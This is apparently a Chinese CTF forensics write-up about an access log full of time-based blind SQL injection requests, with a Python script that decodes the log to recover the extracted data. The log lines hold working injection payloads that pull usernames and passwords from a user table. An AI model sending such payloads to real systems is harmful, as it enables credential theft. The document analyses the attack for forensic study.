    100. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=57,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    101. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=58,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    102. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=59,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    103. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=60,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    104. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=61,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    105. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=62,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    106. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=63,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    107. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=64,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    108. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=65,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    109. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=66,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    110. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=67,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    111. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=68,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    112. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=69,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    113. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=70,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    114. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=71,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    115. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=72,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    116. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=73,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    117. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=74,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    118. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=75,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    119. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=76,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    120. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=77,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    121. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=78,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    122. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=79,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    123. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=80,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    124. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=81,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    125. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=82,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    126. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=83,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    127. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=84,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    128. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=85,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    129. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=86,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    130. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=87,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    131. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=88,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    132. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=89,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    133. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=90,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    134. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=91,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    135. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=92,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    136. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=93,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    137. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=94,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    138. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=95,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    139. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=96,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    140. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=97,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    141. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=98,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    142. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=99,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    143. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=100,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    144. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=101,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    145. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=102,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    146. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=103,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    147. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=104,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    148. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=105,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    149. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=106,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    150. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=107,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    151. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=108,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    152. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=109,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    153. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=110,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    154. 172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=111,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    155. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=40,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    156. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=41,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    157. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=42,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    158. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=43,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    159. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=44,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    160. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=45,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    161. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=46,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    162. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=47,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    163. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=48,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    164. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=49,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    165. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=50,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    166. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=51,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    167. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=52,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    168. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=53,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    169. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=54,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    170. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=55,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    171. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=56,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    172. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=57,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    173. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=58,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    174. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=59,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    175. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=60,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    176. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=61,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    177. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=62,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    178. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=63,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    179. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=64,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    180. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=65,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    181. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=66,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    182. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=67,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    183. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=68,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    184. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=69,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    185. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=70,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    186. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=71,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    187. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=72,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    188. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=73,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    189. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=74,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    190. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=75,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    191. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=76,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    192. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=77,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    193. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=78,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    194. 172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-

    看起来是sql注入日志,盲注类型,而且已经是注入在最后一步,获取字段内容了

    可以从日志里提取注入信息

    编写脚本:

    1. import urllib.parse
    2. f = open(".\\txt\\access.txt","r").readlines()
    3. s = []
    4. for i in range(0,3523):
    5. 	data = urllib.parse.unquote(f[i])#url解码
    6. 	payload = data.split("or")[2]#截取and后面的字符
    7. 	number = payload.find("from user),")#确定大概的位置
    8. 	data1 = payload[number+ 11:].split(",")[0]#取第一个数据
    9. 	data2 = payload[number + 11:].split("=")[1].split(",")[0]#取>后的数据
    10. 	s.append([data1,data2])
    11. 	
    12.  
    13. #转码输出
    14. for i in range(1,len(s)):
    15.     if (s[i][0] != s[i-1][0]):
    16.        print(chr(int(s[i-1][1])),end="")#输出变化前的最后一个字符

  • 相关阅读:
    Python | 根据子列表中的第二个元素对列表进行排序
    transfomer中attention为什么要除以根号d_k
    嵌入式Linux应用开发-基础知识-第十九章驱动程序基石②
    归并排序算法代码
    c编译器学习07:minilisp编译器改造(debug模式支持调试)
    梅西进球了,用Python预测世界杯冠军是 ... 网友:痛,太痛了
    一位毕业生的自我分享
    VSCode创建VUE前端项目
    JS快速入门
    Apache POI 解析和处理Excel
  • 原文地址:https://blog.csdn.net/wp568/article/details/133951557